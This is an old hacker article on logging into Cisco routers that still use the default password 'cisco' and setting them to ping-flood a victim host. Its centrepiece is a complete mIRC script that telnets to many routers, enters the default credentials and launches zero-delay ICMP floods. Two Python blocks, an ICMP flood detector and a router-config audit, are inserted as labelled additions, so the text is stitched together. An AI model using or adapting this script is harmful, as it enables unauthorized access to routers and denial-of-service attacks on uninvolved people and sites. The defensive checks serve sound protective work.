ICMP dangers hiding on non-protected Cisco routers

Lots of people may already have heard about those IRC DDoS bots that can easily flood individuals or even web sites. However, it is hard, or at least takes a lot of work, to spread the trojan to all the hosts that are later used to generate the malicious traffic (UDP and ICMP in most cases) that disconnects dial-up users from the Internet, makes cable/ADSL/etc. users lag badly and slows down web servers. ICMP flood traffic can be generated by a malicious user more easily; no DDoS zombies are required. Thanks to security-careless administrators we have a situation that allows anyone to use non-protected Cisco routers (which in most cases are meant to protect their actual servers) to generate a huge amount of ICMP echo requests (pings) against a target host. And we should remember that those routers are usually equipped with good bandwidth, which makes the ping attack more powerful.

The actual situation is as follows: a malicious user runs a scanner focused on finding Cisco routers that are protected only by the default password (in this case the default password is "cisco"). After he has found enough non-protected routers he may telnet into each of them and manually set them all to ICMP flood a target host. Note that all this is made possible by security-careless administrators who don't bother to set a new password for their routers.

How does one set a Cisco router to ICMP flood a certain host?

Telnetting into a Cisco router and setting it to flood a certain host doesn't require much knowledge about how routers work; actually the attacker may have no idea about routers or what they are, but some knowledge of the ping command and ICMP flooding is enough for a malicious user to cause havoc.
Next I'll show line by line what the malicious user actually does when connected to a non-protected Cisco router:

(this is the password if administrators haven't bothered to change it)
(this command turns on privileged mode, which is needed to modify some important ping settings)
(the password needs to be entered again in order to change to privileged mode)
(protocol)
(can't be more than 18024)
(0 for flooding)
(no)
(no; if you put y or yes here you would get the extended commands)

Now the router will start ICMP flooding the specified victim, and the hacker can telnet into another router and perform the same steps there. As you might have noticed, telnetting into each router one by one is slow and requires "lots" of work. Well, this can be done more easily without opening a telnet client and telnetting into each router. I included a small mIRC script in this text to show how the routers can be controlled easily from a mIRC client.

alias cisco { inc %cisco.open | sockopen cisco [ $+ [ %cisco.open ] ] $1 23 }
alias cisco-clr { set %cisco.open 0 | sockclose cisco* | set %cisco.nuke.notice on }
on 1:sockopen:cisco*:{
  .timer 1 1 sockwrite -n $sockname cisco
  .timer 1 1 sockwrite -n $sockname enable
  .timer 1 1 sockwrite -n $sockname cisco
  .timer 1 1 sockwrite -n $sockname ping
  .timer 1 1 sockwrite -n $sockname ip
  .timer 1 1 sockwrite -n $sockname %newk.ip
  .timer 1 1 sockwrite -n $sockname %pngtimes
  .timer 1 1 sockwrite -n $sockname %psize
  .timer 1 1 sockwrite -n $sockname %delay
  .timer 1 1 sockwrite -n $sockname n
  .timer 1 1 sockwrite -n $sockname n
}
alias cisco-w { window -naek0 @Cisco /cisco Arial 12 }
menu channel {
  -
  [Cisco]
  .Flood IP [ %newk.ip ]:/set %newk.ip $$?="Enter IP to flood " | /echo -a *** Done now type /cisco routerip to begin flooding
  .Set Times To Ping a Target [ %pngtimes ]:/set %pngtimes $$?="Times to send a ping" | /echo -a Done
  .Set ICMP Packet Size [ %psize ]:/set %psize $$?="ICMP packet size (must be between 30 and 18024)" | /echo -a Done
  .Set Delay Between Packets [ %delay ]:/set %delay $$?="Delay Between ICMPs in Secs (0 for flooding)" | /echo -a Done
  .-
  .Stop Flooding:/cisco-clr
  .-
}
on *:sockread:cisco*:{
  if ($sockerr > 0) return
  sockread %cisco
  if ($window(@cisco,1) == $null) { cisco-w | goto next }
  :next
  if (send isin %cisco) && (%cisco != $null) { echo @cisco %cisco }
  if ($chr(33) isin %cisco) { echo @cisco $sock($sockname).ip - %cisco }
  else { halt }
}
;telnet
alias telnet {
  set %telnet.n $2
  sockopen telnet %telnet.n 23
  echo @telnet -Connecting-
}
alias telnet-w { window -naek0 @Telnet Terminal 12 }
on 1:input:@telnet:{
  if ($1 == /telnet) && ($2) && (!$sock(telnet).ip) { telnet $1- }
  if ($1 == /telnet) && ($sock(telnet).ip) { echo @telnet -Already Connected to $sock(telnet).ip $+ - }
  elseif ($sock(telnet).ip) { sockwrite -n telnet $1- | echo @telnet -> $1- }
}
on 1:sockopen:telnet:{ echo @telnet *** CONNECTING }
on 1:sockclose:telnet:{ echo @telnet *** DISCONNECTED }
on 1:sockread:telnet:{
  if ($sockerr > 0) return
  sockread %telnet
  if ($window(@telnet,1) == $null) { telnet-w | goto next }
  :next
  if (%telnet != $null) { echo @telnet %telnet }
}
menu @telnet {
  connect:/sockopen telnet $$?="Enter Ip"
  disconnect:/sockclose telnet | echo @telnet *** DISCONNECTED
}

The above script simply connects to the router and sets it to flood the victim host. As you can see, it supports variables such as how many times to ping a target and the ICMP packet size (all the variables must be set from the pop-up menu in your mIRC client before connecting to the router). This script may become useful to someone who has collected many non-protected routers: only the asked variables have to be set, and then the script connects and sets all the routers to flood a victim, which is much faster than telnetting into each router manually one by one. However, this script doesn't support those routers that allow outgoing spoofed packets (no one would want to pass up spoofing ability if it is available).
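Whichever router it comes from, the flood the script sets up looks the same on the wire: a huge number of echo requests, large ones, with no delay between them. The following is an added example (not part of the original text or its script) that flags that pattern in per-packet records such as a capture tool exports; the record format, the addresses and the thresholds are constructed assumptions, not measured values.

```python
from collections import defaultdict

# Constructed per-packet records: (seconds, src_ip, dst_ip, icmp_type, ip_length).
# ICMP type 8 is an echo request. Flow 1 mimics the router ping the text describes
# (400 requests of 1500 bytes with no delay); flow 2 is an ordinary one-per-second ping.
SAMPLE_PACKETS = (
    [(10.0 + i * 0.001, "198.51.100.1", "203.0.113.9", 8, 1500) for i in range(400)]
    + [(10.0 + i, "198.51.100.1", "192.0.2.50", 8, 64) for i in range(5)]
    + [(12.3, "203.0.113.9", "198.51.100.1", 0, 1500)]  # an echo reply, ignored
)

def find_echo_floods(packets, window=1.0, min_pkts=100, min_avg_len=1000):
    """Return {(src, dst): (peak_pkts, avg_len)} for each echo-request flow that sends
    at least min_pkts packets inside any `window` seconds with an average IP length of
    min_avg_len bytes or more. The default thresholds are assumptions for the sample."""
    flows = defaultdict(list)
    for ts, src, dst, icmp_type, length in packets:
        if icmp_type == 8:
            flows[(src, dst)].append((ts, length))
    alerts = {}
    for key, pkts in flows.items():
        pkts.sort()
        lo = 0
        for hi in range(len(pkts)):
            while pkts[hi][0] - pkts[lo][0] > window:  # slide the window's left edge
                lo += 1
            count = hi - lo + 1
            if count >= min_pkts:
                avg = sum(length for _, length in pkts[lo:hi + 1]) / count
                if avg >= min_avg_len and count > alerts.get(key, (0, 0))[0]:
                    alerts[key] = (count, avg)  # keep the busiest window per flow
    return alerts
```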
To test whether the router supports spoofing, a malicious user would modify the extended commands when the router asks for them and set a different source host for the packets; if the router reports an invalid source address after setting a source host, it means the router doesn't support spoofing (the earlier example and the mIRC script bypassed the extended commands).

What makes this "router attack" method possible?

First of all, administrators who haven't set a password to protect their routers have created a huge security risk for their own networks in the first place, but they have created a security risk for third-party users too. As the above text shows, a non-protected router can become part of a DDoS attack against a third-party network, individual, etc. Another thing I'd like to mention is the pinging capabilities of those routers. If they didn't support a huge number of sent packets, a zero-second packet delay and big packet sizes, ICMP attacks performed from routers wouldn't be a serious problem. I don't see any real use for the ability to ping a certain host hundreds (or thousands) of times, nor do I see any use for the zero-second delay between packets or the big packet sizes that those routers allow.

hypnosis, Hal
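As an added example (not from the original text), here is a small check that reads a router's running-config and reports the conditions the text relies on: a default enable or vty password, telnet reachable from any source, and no access-class on the vty lines. Both config samples are constructed, the secret hashes are placeholders, and the finding codes are my own names.

```python
import re

# Constructed sample of the running-config the text describes: enable and vty passwords still "cisco", telnet open to any source.
WEAK_CONFIG = """\
enable password cisco
line vty 0 4
 password cisco
 login
 transport input telnet
"""

# Constructed sample of the same router hardened (the type-5 hashes are placeholders).
HARDENED_CONFIG = """\
enable secret 5 $1$PLACEHOLDER$hashgoeshere
username netops secret 5 $1$PLACEHOLDER$hashgoeshere
line vty 0 4
 access-class 10 in
 login local
 transport input ssh
"""

DEFAULT_PASSWORDS = {"cisco", "password", "admin"}  # "cisco" is the one the text names

def vty_blocks(config):
    # Yield each 'line vty ...' section as a list of its stripped indented sub-lines.
    block = None
    for line in config.splitlines() + ["end"]:  # sentinel flushes the last block
        if line.startswith(" ") and block is not None:
            block.append(line.strip())
            continue
        if block is not None:
            yield block
        block = [] if line.startswith("line vty") else None

def audit(config):
    findings = set()
    m = re.search(r"^enable password (?:7 )?(\S+)", config, re.M)
    if m and m.group(1).lower() in DEFAULT_PASSWORDS:
        findings.add("ENABLE_DEFAULT_PASSWORD")
    if not re.search(r"^enable secret ", config, re.M):
        findings.add("NO_ENABLE_SECRET")  # 'enable password' is reversible; use a secret
    for body in vty_blocks(config):
        if not any(l.startswith("access-class ") for l in body):
            findings.add("VTY_NO_ACCESS_CLASS")  # any source IP may reach the vty lines
        transport = [l.split() for l in body if l.startswith("transport input ")]  # assumption: none present means telnet allowed
        if not transport or any("telnet" in t or "all" in t for t in transport):
            findings.add("VTY_TELNET_ALLOWED")
        if any(l.split()[-1].lower() in DEFAULT_PASSWORDS for l in body if l.startswith("password ")):
            findings.add("VTY_DEFAULT_PASSWORD")
    return sorted(findings)
```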